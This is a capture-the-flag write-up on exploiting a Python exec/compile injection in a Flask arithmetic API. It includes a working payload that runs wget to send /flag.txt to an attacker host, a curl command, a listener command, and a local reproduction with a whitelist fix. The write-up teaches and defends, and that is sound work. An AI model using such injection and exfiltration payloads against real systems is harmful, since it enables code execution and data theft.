Pierre Gaulon

Pierre Gaulon Github pages


[Web] Evaluation deck

This challenge is about a web application that exposes an API endpoint to perform an arithmetic operation. It takes two numbers and one operator, builds a Python statement from them with an f-string, and evaluates it with compile and exec:

@api.route('/get_health', methods=['POST'])
def count():
    if not request.is_json:
        return response('Invalid JSON!'), 400

    data = request.get_json()

    current_health = data.get('current_health')
    attack_power = data.get('attack_power')
    operator = data.get('operator')

    # A JSON integer 0 is falsy and gets rejected here; the string "0" passes.
    if not current_health or not attack_power or not operator:
        return response('All fields are required!'), 400

    result = {}
    try:
        # Both numbers are coerced with int(), but `operator` is interpolated
        # into the source text verbatim and then exec'd: arbitrary code execution.
        code = compile(f'result = {int(current_health)} {operator} {int(attack_power)}', '<string>', 'exec')
        exec(code, result)
        return response(result.get('result'))
    except:
        return response('Something Went Wrong!'), 500

The two numbers are passed through int(), so they cannot carry code, but the operator is inserted into the statement as-is. We can take the following payload, replacing the operator with a semicolon-terminated system call that exfiltrates the flag as a query-string parameter to a host we control (the numbers are sent as the strings "0" rather than the integer 0, which the falsy check above would reject):

{"current_health":"0", "attack_power":"0", "operator": ";__import__('os').system('wget 1.2.3.4:4444?aaa=`cat /flag.txt`');"}
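To see why the semicolon works, and what the fix looks like, here is a local reproduction of the sink next to a hardened version. This is an added example, not the challenge's code: the function names, the harmless injection string (it only calls os.getcwd() instead of exfiltrating anything) and the operator whitelist are my own choices.

```python
"""Reproduce the Evaluation Deck sink locally and contrast it with a safe version.

Added example; names and the constructed injection below are not from the challenge.
"""
import operator


def vulnerable_eval(current_health, attack_power, op):
    """Mirror of the challenge's sink: `op` is interpolated into the source verbatim.

    Returns the globals dict that exec() populated, so the caller can inspect what ran.
    """
    namespace = {}
    code = compile(f'result = {int(current_health)} {op} {int(attack_power)}',
                   '<string>', 'exec')
    exec(code, namespace)
    return namespace


# Constructed injection (harmless stand-in for the wget/cat payload): the leading ';'
# terminates the `result = 0` statement, then arbitrary Python runs, and the trailing
# ';' turns the final `0` into its own expression statement so the source still parses.
INJECTION = "; pwned = __import__('os').getcwd();"

# Hardened version: map the operator string to a function instead of building source.
ALLOWED_OPERATORS = {
    '+': operator.add,
    '-': operator.sub,
    '*': operator.mul,
    '/': operator.truediv,
}


def safe_eval(current_health, attack_power, op):
    """Same feature, no code generation: unknown operators are rejected outright."""
    try:
        fn = ALLOWED_OPERATORS[op]
    except KeyError:
        raise ValueError('operator not allowed')
    return fn(int(current_health), int(attack_power))


def demo():
    """Run both paths on a legitimate request and on the injection; return the outcomes."""
    outcomes = {}
    outcomes['legit_vulnerable'] = vulnerable_eval('7', '3', '-')['result']
    outcomes['legit_safe'] = safe_eval('7', '3', '-')

    # The vulnerable path happily executes the injected statement...
    injected = vulnerable_eval('0', '0', INJECTION)
    outcomes['injection_ran'] = 'pwned' in injected
    outcomes['injection_result'] = injected['result']

    # ...while the hardened path never sees it as code.
    try:
        safe_eval('0', '0', INJECTION)
        outcomes['injection_blocked'] = False
    except ValueError:
        outcomes['injection_blocked'] = True
    return outcomes


if __name__ == '__main__':
    for key, value in demo().items():
        print(f'{key}: {value}')
```

The int() coercion is the only reason the two numeric fields are not injectable too; the same request with a non-numeric current_health raises ValueError inside the bare except and comes back as a 500. Whitelisting the operator removes compile/exec from the request path entirely, which is the fix the challenge is hinting at.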

And send it with curl. The endpoint checks request.is_json, so the Content-Type has to be application/json (curl's default for -d is application/x-www-form-urlencoded, which would be rejected with "Invalid JSON!"):

curl -H 'Content-Type: application/json' -d @payload.txt http://157.245.42.104:32089/api/get_health

With a Python listener already running on the attacker host (1.2.3.4 in the payload) before the request is sent, the flag arrives in the listener's access log as the aaa query parameter of the incoming GET request:

python -m http.server 4444